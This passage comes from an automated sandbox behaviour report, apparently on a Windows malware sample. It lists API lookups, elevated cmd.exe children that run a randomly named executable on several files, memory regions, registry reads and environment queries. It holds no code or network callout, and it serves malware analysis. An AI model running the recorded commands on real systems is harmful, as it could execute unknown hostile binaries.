| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x75285f30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageW, address_out = 0x75284a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x75285fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x7527a510 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsW, address_out = 0x7527c8c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeW, address_out = 0x75286300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x75279a90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x752861b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadErrorMode, address_out = 0x7527fae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSize, address_out = 0x77cf4f40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringW, address_out = 0x75279a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x752779b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x7527fcb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x752792b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x7527a300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x75286180 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindResourceW, address_out = 0x75283a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SizeofResource, address_out = 0x75278cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x75285f20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x75272af0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadResource, address_out = 0x752778f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x75272db0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x75272da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LockResource, address_out = 0x75277a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x7527a4b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x75279660 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryW, address_out = 0x7527a0b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x7527a060 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x752787c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x75278840 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x75277940 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x75279560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleScreenBufferInfo, address_out = 0x752869c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileType, address_out = 0x75286390 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringW, address_out = 0x752a1c30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleW, address_out = 0x752868e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x75286920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointerEx, address_out = 0x75286540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x77ce5e80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x77ce5e00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x752a26a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x77cdda90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x77cff190 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x77cfa200 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x752874f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x75279fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x75272d60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x752775a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x752725e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleMode, address_out = 0x75286870 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleInputA, address_out = 0x752868c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleMode, address_out = 0x75286900 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x75279700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x75271b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x77d02570 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExW, address_out = 0x75277920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x77cf9920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x752862a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x75286590 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x75286860 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7527a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x75279680 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x752864a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoW, address_out = 0x7527a080 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x752a28e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x7527a2c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x75286020 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x752777b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x7527fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsAlloc, address_out = 0x75279a70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x75271ba0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x75271da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsFree, address_out = 0x75279930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x7527a090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x75278770 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x7527fd10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x75279fc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x75277910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x75279a80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x75272dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x75271d90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x75272b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x7527a3b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x7527a0f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x77cdbae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x752864f0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetTokenInformation, address_out = 0x76a2ed40 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteKeyW, address_out = 0x76a2fca0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueW, address_out = 0x76a295e0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x76a30680 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x76a2ee90 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x76a2f0a0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x76a2ed60 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x76a2ed80 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x76a2f590 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyW, address_out = 0x76a306c0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x76a2efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupAccountSidW, address_out = 0x76a2f7b0 |
|
1 | |
| Get Address | c:\windows\syswow64\comdlg32.dll | function = PrintDlgW, address_out = 0x7516c6a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartPage, address_out = 0x770aee10 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndDoc, address_out = 0x770855a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartDocW, address_out = 0x770857e0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = SetMapMode, address_out = 0x77089590 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetDeviceCaps, address_out = 0x77080820 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndPage, address_out = 0x770afbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SendMessageW, address_out = 0x771638f0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DialogBoxIndirectParamW, address_out = 0x7717b6b0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = EndDialog, address_out = 0x7717b430 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorW, address_out = 0x77167740 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = InflateRect, address_out = 0x771774e0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSysColorBrush, address_out = 0x7717efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetCursor, address_out = 0x77184ed0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWindowTextW, address_out = 0x77174580 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetDlgItem, address_out = 0x77171540 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoW, address_out = 0x748e1580 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = VerQueryValueW, address_out = 0x748e1500 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoSizeW, address_out = 0x748e1560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x7527a330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x7527f400 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x75277580 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x75279910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x75286030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x75285f90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x75285ff0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x7527a5d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x7527a690 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x77cd40f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x77ccd630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x77ccecf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x75285720 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x77cce140 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x77cceb60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x77d09990 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x77d05540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x77cf9dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x7527a550 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x752a0a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x74fa0790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x7527f8a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x7527fa30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x752a1030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x7527a000 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x752a14b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x7527a4f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x752a16f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x75279970 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x74f23c90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x75278710 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsWow64Process, address_out = 0x752796e0 |
|
1 |
System (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-11-09 19:48:32 (UTC) |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #211: cmd.exe
54
0
| Information | Value |
|---|---|
| ID | #211 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c G13k6QZj.exe -accepteula "JNTFiltr.dll.mui" -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:22, Reason: Child Process |
| Unmonitor | End Time: 00:03:26, Reason: Self Terminated |
| Monitor Duration | 00:00:04 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x118 |
| Parent PID | 0xc70 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
DB4
0x
A40
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x00000000007c0000 | 0x007c0000 | 0x007dffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000007c0000 | 0x007c0000 | 0x007cffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000007d0000 | 0x007d0000 | 0x007d3fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000007e0000 | 0x007e0000 | 0x007e1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000007e0000 | 0x007e0000 | 0x007e3fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000007f0000 | 0x007f0000 | 0x00803fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000810000 | 0x00810000 | 0x0084ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000850000 | 0x00850000 | 0x00853fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000860000 | 0x00860000 | 0x00860fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000870000 | 0x00870000 | 0x00871fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000880000 | 0x00880000 | 0x008bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000008c0000 | 0x008c0000 | 0x0091ffff | Private Memory | rw |
|
|
|
- |
| cmd.exe | 0x00930000 | 0x0097ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000980000 | 0x00980000 | 0x0497ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004980000 | 0x04980000 | 0x04a7ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004b30000 | 0x04b30000 | 0x04b3ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004b40000 | 0x04b40000 | 0x04d4ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x04b40000 | 0x04bfdfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004c50000 | 0x04c50000 | 0x04d4ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004d50000 | 0x04d50000 | 0x04e4ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x04e50000 | 0x05186fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007e9a0000 | 0x7e9a0000 | 0x7ea9ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007eaa0000 | 0x7eaa0000 | 0x7eac2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007eac3000 | 0x7eac3000 | 0x7eac3fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007eac9000 | 0x7eac9000 | 0x7eacbfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007eacc000 | 0x7eacc000 | 0x7eaccfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007eacd000 | 0x7eacd000 | 0x7eacffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7df8ee37ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007df8ee380000 | 0x7df8ee380000 | 0x7ff8ee37ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
2 | |
| Get Info | G13k6QZj.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
4 | |
| Open | STD_INPUT_HANDLE | - |
|
2 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 192, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\G13k6QZj.exe | os_pid = 0x300, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x930000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75260000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x752a2780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x7527fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7527a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74f835c0 |
|
1 |
Environment (17)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
6 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000001 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #212: cmd.exe
54
0
| Information | Value |
|---|---|
| ID | #212 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c G13k6QZj.exe -accepteula "publisherfunnydownloaded.exe" -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:22, Reason: Child Process |
| Unmonitor | End Time: 00:03:29, Reason: Self Terminated |
| Monitor Duration | 00:00:07 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xde8 |
| Parent PID | 0x380 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
CE4
0x
E24
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| cmd.exe | 0x00930000 | 0x0097ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000fb0000 | 0x00fb0000 | 0x04faffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004fb0000 | 0x04fb0000 | 0x04fcffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004fb0000 | 0x04fb0000 | 0x04fbffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000004fc0000 | 0x04fc0000 | 0x04fc3fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004fd0000 | 0x04fd0000 | 0x04fd1fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004fd0000 | 0x04fd0000 | 0x04fd3fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004fe0000 | 0x04fe0000 | 0x04ff3fff | Pagefile Backed Memory | r |
|
|
|
- |
